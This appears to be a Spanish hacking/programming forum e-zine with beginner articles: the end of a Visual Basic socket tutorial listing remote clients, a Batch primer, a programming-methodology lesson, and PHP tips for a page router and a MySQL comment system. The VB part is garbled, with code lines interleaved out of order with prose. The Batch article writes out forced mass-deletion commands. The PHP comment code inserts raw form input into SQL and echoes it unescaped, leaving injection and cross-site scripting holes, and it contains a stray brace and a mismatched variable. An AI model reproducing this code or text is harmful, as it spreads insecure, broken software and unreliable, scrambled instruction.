Set x = lv.ListItems.Add(, Index & "|", data(1)) ‘añadimos los datos, y en la key el indice y “|” para luego partirlo y poder identificar
x.SubItems(1) = WS(Index).RemoteHostIP ‘mas datos que añadimos....
x.SubItems(2) = data(2) & "/" & data(3)
x.SubItems(3) = data(4)
x.SubItems(4) = data(5) & " MB"
x.SubItems(5) = data(6)
x.SubItems(6) = data(7)

Código:

x.SubItems(7) = data(8)

Código:

x.SubItems(8) = data(9)

x.SubItems(9) = "v.1"
End Select

Voy a explicar un poco eso de split y arrays:
End If
Nosotros enviamos esto:
Conexión|Minombre|127.0.0.1|mascotas….
End Sub
Entonces lo que hacemos es partirlo, y almacenarlo en un array(en data).

De manera que data(0) es lo primero, en este caso “Conexión”,por eso se hace Select Case data(0) porque lo usamos como identificador.
Data(1) lo siguiente “Mi nombre” y así sucesivamente….

Bueno, en la siguiente e-zine mas Wink

Espero que les haya gustado, se que no me explico muy bien pero bueno…
On Error Resume Next
Si tienen dudas tienen el foro, saludos!
Dim datos As String
Si hay fallos notifíquenmelo!
Dim data() As String
Puede ser porque lo hice rapidito ^^
WS.GetData datos ‘los recibimos
Data=split(datos,”|”)
PD:El resultado final:

By Don Nadie

Introducción al Batch by Furious Dami

¿En qué consiste Batch?

Batch es un lenguaje de programación que utiliza el Sistema Operativo MS-Dos como interprete. No necesita editores ni otros programas, se utiliza el Bloc de Notas (NotePad) o con cualquier editor de palabra: simplemente lo guardamos con extensión .bat. Cualquier archivo con extensión .bat es asumido por el sistema operativo como un ejecutable al igual que los archivos con extensión .exe y los .com, básicamente los archivos de proceso por lotes se puede correr desde cualquier parte, desde que se tenga un acceso directo o icono lo podemos lanzar desde el escritorio, una carpeta, en fin es un ejecutable (Windows nos permite especificarle al sistema operativo que archivos queremos que sean ejecutables) desde un bat también, solo es cuestión de modificar un poco el registro), incluso desde otros programas sin importar el tipo de lenguaje: por ejemplo se puede llamar un bat desde html, lo mismo que desde cualquier bat se pueden ejecutar otros programas, desde bat se puede hacer cualquier cosa que se base en Windows.

El bloc de notas

Para programar en Batch necesitaremos el Bloc de Notas de Windows, tal vez parezca algo poco común pero es la herramienta que se utiliza para programar en Batch. En el Bloc escribiremos los Source Code (Códigos Fuente) de nuestros Batch, luego en la opción “Guardar como…” elegimos todos los archivos y lo guardamos con extensión ".bat", debemos tener cuidado con estos archivos, por que si jugamos con comandos como del *.* o algo similar podríamos dañar estropear nuestros datos y hasta el S.O., claro que también existen formas de recuperarlos , pero esa no es la idea.

Para ejecutar nuestros Batch necesitaremos la Consola (MS-Dos, Símbolo de sistema, Línea de comandos o como le quieran llamar) que podemos acceder a ella desde la opción Ejecutar del Menú Inicio, escribimos Cmd y listo. La consola es una pantalla negra en la que escribiremos los comandos y la que Ejecutara nuestros programas Batch.No todos los comandos que se usan en batch se aplican a la consola de comandos, claro que son pocos !!!

Los Comandos de programación en Batch son los mismos usados en MS-Dos y a continuación daremos una breve explicación de cada comando y los parámetros utilizados. Para obtener información sobre cualquier comando tecleamos en la consola el nombre del comando. Ej:

Los Comandos presentados a continuación son tan solo los más usados para ver mas buscar en la carpeta “C:\Windows\System32” los archivos sin iconos y con extensión “.exe” o “.com”.

Comandos

At: Programa comandos o archivos para que se ejecuten a una hora determinada.
Attrib: Muestra y cambia los atributos de archivos.
Cd: Muestra o cambia el directorio (carpeta) actual.
Chdir: Muestra o cambia la carpeta actual.
Chkdsk: Escanea y muestra el status de un disco.
Cls: Borra la pantalla.
Cmd: Inicia una nueva ventana del procesador de comandos de Windows XP.
Color: Cambia los colores del fondo y de la letra de la consola.
Comp: Compara el contenido de los archivos.
Compact: Muestra o altera la compactación de archivos en discos NTFS.
Convert: Convierte volúmenes FAT en NTFS.
Copy: Copia uno o mas archivos a un directorio diferente.
Date: Muestra o altera la fecha.
Del: Borra archivos.
Dir: Muestra todos los archivos en la carpeta actual.
Diskcomp: Compara el contenido de dos discos de 3½.
Diskcopy: Copia el contenido de dos discos de 3½.
Erase: Borra archivos.
Echo: Oculta el eco de los comandos (no permite que se vean los comandos).
Exit: Sale de la consola.
FC: Compara y exibe diferencias entre archivos.
Find: Busca una secuencia de textos en uno o mas archivos.
Format: Formatea un disco.
Goto: Direcciona la consola a una línea de un archivo por lotes.
IF: Realiza procesamiento bajo condiciones especificas de un archivo por lotes.
Label: Cambia la etiqueta de volumen de un disco.
MD: Crea una nueva carpeta.
Move: mueve uno o más archivos de una carpeta a otra.
Pause: Pausa el procesamiento de un archivo por lotes hasta presionar una tecla.
Print: Imprime un texto o archivo.
RD: Remueve una carpeta o directorio.
Recover: Recupera información legible de un disco dañado.
Rem: Graba comentarios en archivos por lotes o en Config.sys
Ren: Cambia el nombre de un archivo.
Replace: Substituye archivos.
Set: Muestra, crea o borra las variables de entorno.
Start: Inicia una ventana nueva para ejecutar un comando o programa.
Subst: Asocia un camino a una letra de unidad.
Time: Muestra o modifica la hora del sistema.
Tree: Exibe gráficamente el árbol de un directorio raíz.
Type: Muestra el contenido de un archivo de texto.
Title: Cambia el titulo de la ventana de la consola.
Ver: Muestra la versión de Windows.
Vol: Muestra la etiqueta y el volumen de una unidad.
Shutdown: Apaga o reinicia la PC.
Command: Inicia una nueva ventana del procesador de comandos de MS-Dos.
Nul: Sirve para anular la respuesta de un comando.
Tskill: Finaliza programas y procesos (solo para XP Home Edition).
Taskkill: Finaliza programas y procesos (solo para XP Professional).
Net: Administra y configura servicios.

Los Parámetros

Se usan para modificar o alterar la función de un comando. Por ejemplo el comando “DEL”.
Del sin parámetros sirve para borrar archivos comúnmente, pero con los parámetros:
/P: Solicita confirmación antes de borrar cada archivo.
/F: Fuerza la eliminación archivos de solo lectura o del sistema.
/S: Borra los archivos de la carpeta actual y todas las sub-carpetas.
/A: Selecciona los archivos a ser borrados basándose en los atributos. Por ejemplo si utilizamos:
Del /F /P autoexec.bat
Nos pediría confirmación para borrar el archivo “autoexec.bat”, que es un archivo del sistema.

NOTA: Los parámetros de los comandos que esten entre corchetes �Los Asteriscos (*)

Los asteriscos son comodines que sirven para indicar “todo”, aquí van algunos ejemplos de uso de los asteriscos:

1) Imagina que quieres eliminar todos los archivos .mp3 de la unidad C:\

El código en Batch sería:

Del /Q /F C:\*.mp3
Que indica que se deben eliminar “todos” los archivos con extensión .mp3 de la unidad C:

Si el código fuese:

Del /Q /F C:\50ce*.mp3
Indicaría que elimine todos los mp3 que comiencen con el nombre “50ce” sin importar como terminen.

Del /Q /F C:\*50ce.mp3
Indicaría que se eliminen todos los archivos mp3 que terminen en “50ce” sin importar como empiecen.

2) Supongamos que deseas borrar todo los archivos llamados Mío en Mis Documentos, para eso utilizarías:

Del /Q /F “C:\Documents and Setings\%username%\Mis Documentos\Mio.*”

Con esto estas indicando que se borren todos los archivos que se llamen “Mío”, pero con todas las extensiones.

3) Si quieres eliminar todos los archivos de Word (.doc) y WorPad (.dot) en la unidad C: con el nombre Poemas se utilizan de esta forma:

Del /Q /F C:\poemas.do*
Esto indicaría que se eliminen todos los archivo con el nombre poemas, pero que tengan una extensión que comience con “do”.

Los Redireccionadores (>> y >)
Son usados para redireccionar la salida de texto enviada por un comando a cualquier otro archivo como en el siguiente caso:
Pause > elpause.txt
Si escribiéramos el comando pause solo, saldría el siguiente texto:
Presione cualquier tecla para continuar…
pero al colocar el redireccionador ese texto se guardaría en el archivo “elpause.txt”, otro ejemplo:
echo Somos todos amigos > texto.txt
En este caso la salida de texto del comando echo seria:
Somos todos amigos
Pero con el redireccionador “>” la frase “Somos todos amigos” seria guardada en el archivo “texto.txt”.
El “>”
En el siguiente caso:
Echo La informática es interesante > info.txt
El redireccionador crearía (en caso de que no existiese) un archivo llamado info que tendría adentro la frase “La informática es algo interesante, pero si ya existiese lo que haría seria borrar todo el contenido del archivo y añadirle la frase.

El comando Nul y el “>”

En el siguiente caso:
Echo La informática es interesante>nul
El comando nul a diferencia de los otros no lo guardaría ni redireccionaria simplemente ANULARIA a la frase “La informática es interesante” y no permitiría que apareciera en pantalla.

Las Comillas (“ ”)
Se usan cuando hay espacios en una ruta o cadenas de comando.
Por ej. :
MD C:\Documents and settings\usuario\Mis Documentos\Super Carpeta
Este código estaría erróneo por que faltan las comillas. El correcto sería:
MD “C:\Documents and settings\usuario\Mis Documentos\Super Carpeta”

Como hay espacio en los nombres de las carpetas el código anterior no funcionaria pero usando las comillas se admiten los espacios en las rutas.

El signo Interrogación (?)

Este signo se usa como comodín para indicar que una letra o numero es desconocido, aquí algunos ejemplos:

1) Si quieres eliminar un documento de Word que sabes que empieza con “Gran” y que tiene 3 carctéres mas puedes usar:
Del /Q /F C:\Gran???.doc
El signo “?” indicaría que el resto que esas 3 letras son desconocidas y entonces la maquina buscaría los documentos que empezaran con “Gran” y continuaran 3 caracteres mas hacia delante.

2) Otro ejemplo es si queres mover todos los archivos que terminen con “G” y que tengan 5 letras antes.

Código:

Move C:\?????G.*

Con esto moveríamos todos los archivos que tengan “G” en el sexto lugar.

3) Si queremos eliminar los archivos de Texto que tengan 4 caracteres seria:

Código:

Del C:\????.txt

Con esto borraríamos todos los archivos de texto en la unidad C: sin importar que letras tengan

Los signos de %
Este signo es usado para mostrar variables.

Aquí alguna variables de entorno:

%username%
Con esto mostramos o introducimos el nombre del usuario actual por ejemplo si utilizamos:
Echo El usuario es: %username%
Con esto aparecería el mensaje: El usuario es: Furious Dami
Si fuera el usuario conectado actualmente

%homedrive%
Se usa para indicar el disco local o en el que esta el sistema operativo que estamos utilizando.

%systemroot%
Se usa para definir la carpeta en la que esta instalado Windows por ejemplo: C:\Windows

%computername%
Para mostrar el nombre de la computadora..

%homepath%
Abreviación para ir a la ruta del usuario, Ej:
C:\Documents and Settings\ElUsuario
NOTA: Para variables del comando For en lugar de “%variable%” se usa “%variable”

El signo ^

Este símbolo es útil para mostrar los %, &&, <, >,etc. ya que en Batch los caracteres especiales no son mostrados, y al utilizar estos símbolos si aparecen. Ejemplos

1) Supongamos que deseas escribir “Todo un 100%”

echo Todo un 100%
Esto no funcionaria porque el signo % intentaría mostrar una variable y no aparecería. Entonces el código sería así:
Echo Todo un 100^%
Al utilizar el símbolo ^ en el % aparecería y no estaría definiendo una variable.

2) Si deseas crear un menu que tenga la opción “<1> AGREGAR USUARIO” esto estaría mal:

echo <1> AGREGAR USUARIO
Porque el contenido del archivo “1” se mostraría en Echo y sería redireccionado a “AGREGAR USUARIO”. El código correcto sería así:

echo ^<^> AGREGAR USUARIO
Con esto el > no estaría redireccionando nada y se mostraría en pantalla.

El Signo &

Este es un signo que indica el procesamiento de varios comandos en la misma línea.
Cuando es & espera que se ejecute el primer comando y ejecuta el segundo si el primero finaliza correctamente, pero cuando es && no es necesario que el primer comando finalice
correctamente. A continuación un ejemplo:

Para hacer que se ejecuten el Internet Explorer y El Bloc de Notas con el comando IF al elegir la opción 1 se utilizaría así:

If %variable%==1 (Start iexplore && Start notepad)
Así con el mismo número de opción se ejecutarían el Internet Explorer (Iexplore) y el Bloc de Notas (notepad).

Resultados de set

Resultados de systeminfo

Resultados de Help

By Furious Dami

Metodología de la programación By Alesteir

Algoritmo
Conjunto de operaciones (sentencias y proposiciones) y procedimientos (Toma de decisiones procesos) que deben seguirse para la resolución de un problema. El origen etimológico de la palabra deriva del

nombre latinizado del gran matemático árabe Mohamed Ibn Moussa Al Kow Rizmi, el cual escribió su obra Quitab Al Jabr Al Mugabala, donde se recogía el sistema de numeración hindú y el concepto del cero. Fue el gran matemático Fibonacci, quien tradujo su obra al latín y la inició con las palabras: Algoritmi dicit.

Cuando se usa el lenguaje al

gorítmico debe hacerse un análisis previo del problema que se va resolver, de las deducciones que se saquen se encuentra un método que permita resolverlo, todas esas operaciones a realizar, y el orden especifico en que se ejecutan es lo que se denomina algoritmo, dicho algoritmo se codifica o compila a un sistema comprensible por el computador.

Características:

> Inico,fin
> Preciso
> Simple,Breve y conciso
> Sencillo,Legible
> Modular
> Eficiente y efectivo

PSEUDOCÓDIGO

El pseudocódigo describe un algoritmo utilizando distintas frases comunes e instrucciones de programación y palabras nemotécnicamente modificadas que definen la estructura básica del mismo. Permitiendo al programador centrarse en los aspectos lógicos de la solución al problema, evitando reglas de sintaxis de los lenguajes de programación. Ningún Pseudocódigo es estándar, varia de una persona a otra.

DIAGRAMA DE FLUJO

Representa la esquematización grafica de un algoritmo. En realidad muestra gráficamente los pasos o procesos, a seguir para alcanzar la solución de un problema. Si el diagrama ha sido elaborado correctamente, el paso al lenguaje de programación es simple y directo

Simbología de los diagramas de flujo

Secuenciación

Es una estructura de control que permite al computador, ejecutar una acción después de otra y luego la que sigue y así sucesivamente .Estas acciones consisten en: variables, operaciones primitivas elementales, leer los datos y todos aquéllos procesos que se necesiten para la resolución del problema. Cada instrucción lleva etiquetado un numero en orden descendente empezando con el 1.

Elementos básicos de un algoritmo.

Encabezado-> Nombre del algoritmo

Inicio-> Todo algoritmo empieza con la etiqueta 1

Declaraciones-> se declaran variables, funciones , etc.

Procesos->Leer, calcular, imprimir

Fin->

Ejemplo

Sueldo empleado (Rango)

1 inicio

2 cve, ht: entero

Pht, sueldo: real (flotante)

3 Leer cve, ht, pht

4 sueldo=ht*pht

5 imprimir cve, sueldo

6 fin

Datos
Los datos son el alma y vida de una computadora, todo gira en torno a ellos, los datos pueden ser simples o estructurados, los datos simples son aquellos que solo ocupan una casilla de memoria, significando así que corresponden a un único valor. Ellos pueden ser: Numéricos (Reales, Enteros, de coma flotante, y exponenciales) de Carácter (caracteres, cadenas de caracteres y caracteres ASCII) y lógicos (Booleanos )

De igual forma existen los datos estructurados, a los que para cada dato le son asignadas varias casillas de memoria, pudiendo ser cadenas de caracteres ->(Strings), arreglos ->(Array) y registros-> (Record- En Bases de datos)

Identificadores
Son nombres que representan un objeto dentro de un programa (constantes, variables, datos, procedimientos, funciones), asignar un nombre a las celdas o casillas de
Operadores-> Aritméticos y Lógicos

Se usan para efectuar operaciones aritméticas o lógicas dentro de todos los lenguajes de programación cuando se

la memoria en el computador , deben tener ciertas reglas en cuanto a su escritura se refiere: no deben empezar con números, no tener espacios en blanco, entre otros mas.

Constantes
Es un valor fijo que no puede ser modificado, asignado dentro del programa en ejecución durante el proceso de compilación.

Variables
Son valores que se asignan para modificarse durante la ejecución o la compilación de un programa.

Hasta que no se le da un valor a una variable dentro de un programa, no podemos hacer uso de ella, denominándose a este proceso: sentencia de asignación, siendo esta una operación de destrucción ya que el valor asignado se pierde cuando se sustituye por el nuevo valor .También se debe tener en cuenta que el tipo de expresión debe ser del mismo tipo que el de la variable.

combinan variables y constantes para crear funciones y se juntan con los operadores aritméticos se forman expresiones aritméticas, que generan un valor, puede ser: verdadero o falso.

Operadores Aritméticos
Son los conocidos por todos, ,existen todos los lenguajes.

+ Suma
- Resta
* Multiplicacion
/ Division
^ Exponenciación
mod Módulo
div Division entera

Operadores Lógicos
En ocasiones en los programas se necesitan realizar comparaciones entre distintos valores, esto se realiza utilizando los operadores relaciones, los cuales se listan a continuación

Operador

< Menor que
> Mayor que
<= Menor o igual que
>= Mayor o igual que
= Igual a
<> Distinto a,diferente de

Jerarquía o Precedencia de Operadores
Cuando aparecen dos o mas expresiones aritméticas debemos tener en cuenta la prioridad de la operación a desarrollar, los paréntesis tiene la mayor prioridad, se realizan las operaciones siempre, empezando desde el más interno del nido.

Glosario 1
Algoritmo 􀃆 Sucesión o secuencia ordenada y cronológica de pasos o actividades que conllevan a la solución de un problema o a la ejecución de una labor (o acción).

Programa---> Conjunto de sentencias o instrucciones que hacen funcionar a un computador, por lo general estan compuestos por una serie de módulos y estructuras, ellos realizan un proceso que suple una necesidad de un sistema especifico de información. Al conjunto de programas escritos en y para los computadores se le acuña un término en ingles, muy conocido: Software.

Pseudocódigo--->Término para referirse a un algoritmo, recurriendo a una mezcla de oraciones o palabras en lenguaje cotidiano, instrucciones de programación y

Flujograma o Diagrama de flujo--->Es la representación o esquematización gráfica de un algoritmo, existen unas normas o estándares representativos que definen el tipo de estructura algorítmica, ver Figs. 1 y 2

Tipo de dato--->Define un valor para cada dato y la forma con que será almacenado y procesado posteriormente, los datos pueden ser : numéricos (Reales ,flotantes, etc.), de caracteres, booleanos o lógicos, Etc., cuando un dato se guarda en memoria debe asignársele un valor, para poder realizar posteriormente un determinado proceso correctamente, hay que tener en cuenta que un solo error en la asignación del tipo de dato o un error de escritura pueden dar al traste con todo un programa , es muy importante saber definir el valor a los datos para el apropiado funcionamiento de cualquier programa.

Ciclo--->(Bucle o Loop) Es una repetición de sentencias o secuencia de sentencias un número definido de veces o iteraciones.

Identificador--->Son calificativos que se usan para hacer referencia a variables, constantes, funciones o cualquier objeto definido: bien sea por el programador o por el usuario.

Constante-->Son datos predefinidos que permanecen intactos durante la ejecución de un programa.

Variable--->Es un dato identificador que cambia su valor (existe un valor para cada tipo de dato) mientras el programa esta en acción,

Rutina--->Secuencia de instrucciones o sentencias (modulo), que hace parte de un programa y que puede usarse varias veces dentro de la ejecución del mismo.

Acceso--->Referencia que se hace a a un elemento específico dentro de un arreglo, indicando el nombre del arreglo y la posición del arreglo (índice).

Índice--->Valor que especifica un rango (nombre y ubicación) dentro de un arreglo.

Arreglo--->Es un tipo de dato que contiene una estructurado que permite almacenar varios valores de un mismo tipo, a cada uno de los cuales se accede por un índice entero.

Matriz--->Es una variable que permite almacenar múltiples valores de un mismo tipo.

Este articulo es tan solo una introducción a la metodología de la programación, en la próxima parte practica: diseño de algoritmos y diagramas de flujo, espero lo hayan disfrutado, ah! y si, es de ustedes , hagan lo que quieran con el ! Editorial

-VARIOS TIPS WEB by gallloo

Distintas secciones en un mismo documento

index.php

Código:

<ul>
<li><a href="index.php?pag=home">Home</a></li>
<li><a href="index.php?pag=des">Descargas</a></li>
<li><a href="index.php?pag=jue">Juegos</a></li>
<li><a href="index.php?pag=info">Info</a></li>
</ul>
<?php
if(!isset($_GET["pag"])){
// si no existe la variable de URL, pag...
echo'<script>top.location="index.php?pag=home";</script>'; //redirigimos a home
}
if($_GET["pag"]=="home"){
echo'Bienvenido a mi web... blablabla'; //si la variable es igual a home hacemos tal
}
if($_GET["pag"]=="des"){
echo'Descargate estos magníficos programas....'; //si la variable es igual a des hacemos tal
}
if($_GET["pag"]=="jue"){
echo'Aquí tienes varios juegos:...';
//si la variable es igual a jue hacemos tal
}
}
if($_GET["pag"]=="info"){
echo'Información';
//si la variable es igual a info hacemos tal
}
?>

Ahí dejo explicado de forma breve como hacer una web con diferentes secciones en un mismo documentos php, ahora veremos como hacer un sistema de comentarios algo más complejo ya que requiere algún conocimiento de mysql también.

Sistema básico de comentarios

Crearemos 3 archivos:
-index.php – ahí se encontrarán los comentarios y es donde se postearán.
-bd.php – aquí se encuentra toda la información sobre para conectarnos a la base de datos.
-crear.php – solo lo abrimos una vez y nos servirá para crear las tablas.

bd.php

Código:

<?php
$servidor="server.com:port";
$user="usuario";
$pass="password";
$conexion=mysql_connect($server,$user,$pass);//nos conectamos
mysql_select_db("nombre_bd",$conexion);
//especificamos la base de datos
?>

index.php

Código:

<?php
echo'<form action="index.php?mostrar=si" method="post" >
<input type="text" name="nick" size="20" /><br /><br />
<textarea name="texto" rows="7"></textarea><br /><br />
<input type="submit" value="Enviar" />
</form><br /><br />'; //formulario
include("bd.php");
//incluimos la info de la bd
$query1=mysql_query("select texto from comentario",$conexion);
//llamamos al texto de la tabla
$query2=mysql_query("select nick from comentario",$conexion);
//llamamos al nick de la tabla
while($d1=mysql_fetch_array($query1)){
//la pasamos a array
$d2=mysql_fetch_array($query2);
echo $d1[0]."<br>by ".$d2[0]."<br><br>";
//muestra todos las filas
}
if($_GET["mostrar"]=="si"){
//si la variable GET llamada mostrar es //igual a "si"...
$nick=$_POST["nick"];
//recibimos el nick del form
$texto=$_POST["texto"];
//recibimos el texto del form
mysql_query("insert into comentario(nick, texto) values('$nick','$texto')",$conexion);
//insertamos los datos en la bd
echo '<script>top.location="index.php";</script>';
//redirigimos a la pagina principal //mediante javascript
}
?>

crear.php

Código:

<?php
include("bd.php");//incluimos la info de la bd para crear la tabla
mysql_query("create table comentario(nick varchar(50),texto text)",$conexion); //creamos la tabla
mysql_close($conexion);//cerramos la conexión
?>

Bueno, el sistema de comentarios ya está, no le he añadido ninguna hoja de estilos ni nada (estará un poco soso) pero eso ya lo dejo que lo hagáis vosotros. Ahora explico como subir los archivos al FTP para los más nuevos en la programación web.

Búsqueda de un hosting

En esta ocasión va a ser www.ifastnet.com

Nos registramos, poniendo nuestros datos

Ahora nos redireccionará a un pdf con todos los datos de acceso.

Nos descargamos un cliente FTP

Nos pillamos la ultima versión de filezilla aunque hay otra mas reciente en español pero esta en beta, recuerdo que también está disponible para linux y otros sistemas operativos

Subimos los ficheros de la web por el FTP

Ponemos los datos en el filezilla y nos conectamos

Subimos los archivos de la web

Ya lo tenemos subido

Eso es todo, hasta la próxima.

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 24, 2008, 06:16:44 Boton Buscar